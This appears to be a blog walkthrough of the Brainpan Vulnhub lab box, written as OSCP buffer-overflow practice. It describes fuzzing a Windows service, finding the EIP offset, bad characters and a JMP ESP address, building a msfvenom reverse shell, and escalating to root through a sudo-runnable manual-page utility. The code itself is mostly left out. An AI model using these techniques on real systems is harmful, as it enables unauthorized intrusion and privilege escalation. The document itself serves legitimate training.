Vulnhub virtual machine; OSCP Buffer-Overflow prep. “Where we’re going we don’t need roads”. This box is a perfect test of skills in regards to buffer-overflows and you will work on crafting an overflow that leads to a reverse shell. The escalation of box stems from a pivot via a manual.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Discover VM on network
We have identified several interesting ports 9999 - unknow service but has this “WELCOME TO BRAINPAN” 10000 - SimpleHTTPServer with some type of base64nc
navigating to port 10000 - which lead to this image
Nothing much left to look at.
Connecting to port 9999
we have a password field in which we can try to brute force. Nevermind it just connection refused after several attempts.
webmin is an interesting user possibly
Continuing enumeration with dirbuster
brainpan.exe discovered - download locally to investigate.
PE32 executable - Looks like we’ll be doing some reverse engineering.
Opening file with wine
hmm port 9999 let’s try and connect to localhost on 9999
we recieved a callback to the
brainpan.exe on port 9999
attemping a password of
password looks to have pushed 9 bytes to the buffer.
brainpan.exe into ollydbg
Start twice to run
secondary window (popup)
application is running correctly and awaiting connections to port 9999.
Goal: is to gain control of ESP & EIP to then JMP ESP shellcode to a reverse shell.
create bfuzz.py (fuzzing application) - launch against application
and finally a crash of program around 600 bytes.
create pattern with metasploit
add to buffer skeleton file.
Buffer Skeleton File (
add pattern_create string to buff-skel.py
now the buffer is 600 bytes of non repeating code.
execute buff-skel.py in an attempt to find exactly where application crashes.
verifying data got sent to application via olly
Application is confirm killed via
Access violation when execute  -
EIP = 35724134 (highlighted in registers)
We need to find this exact offset of EIP with
Offset = 524 - the exact number of bytes required to be sent to application to cause the crash
Adjust the buff-skel.py to change to exact 524 “A”s to send to brainpan
we are going to want to try to fill the EIP value with something so we can determine if we’ve taken it over.
Restart application in OllyDbg
crash application with buff-skel.py
Now shows that we have replaced the registers:
EBP: 41414141 = A’s EIP: 42424242 = B’s
Follow ESP dump
brings us to the excution of the C’s and this will be the area where our generated shellcode will be placed.
shellcode is normally 300bytes on average.
Restart application in OllyDbg
Currently we have about 60bytes of space to work with and so we need to attempt to add more space to the C area by changing the 600 to 1400.
significant number of C’s and space available for the shellcode.
Keep in mind bad characters for Buffer Overflows https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
great write up available by Georgia Weidman #hailGeorgia
Testing For Bad Characters
add badchars to buff-skel
run buff-skel for badchars
hex dump shows exactly after the A’s and B’s the badchars sent. If there is a gap in the sequence we can see what exact char is bad.
Note: if shell code doesn’t work its probably a badchar which is possibly stopping you.
Finding the JMP ESP
JMP ESP = 311712f3 - with this we know we can have our shellcode execute from here.
adjust buff-skel.py to add the JMP ESP address
before executing add breakpoint to ollydgb for the JMP ESP
which will not stop at this point when application is ran.
Execute buff-skel.py - hit breakpoint
and directs the
jmp right the C’s where our shell code will exist.
Creating Shellcode Payload
reverse shellcode via msfvenom
-b = for badchar (we know \x00 is a no-go)
add shellcode to buff-skel.py
Setup NC Listener
In some cases the nc listener just doesn’t function property and thats when you need to switch to metasploits.
Setup Metasploit Listener Note: for OSCP exam you are allowed to use the metasploit multi/handler listener as much as you want.
launch metasploit (fastest way)
connection made after buffer-overflow
Upgrade to TTY
quick check of sudo abilities
anasi_util is able to be ran as root
looks to be a
manual [command] which looks like a good way to escalate.
Escalation via vi:
enter escape sequenence
Gimme the loot!
Bring me the root!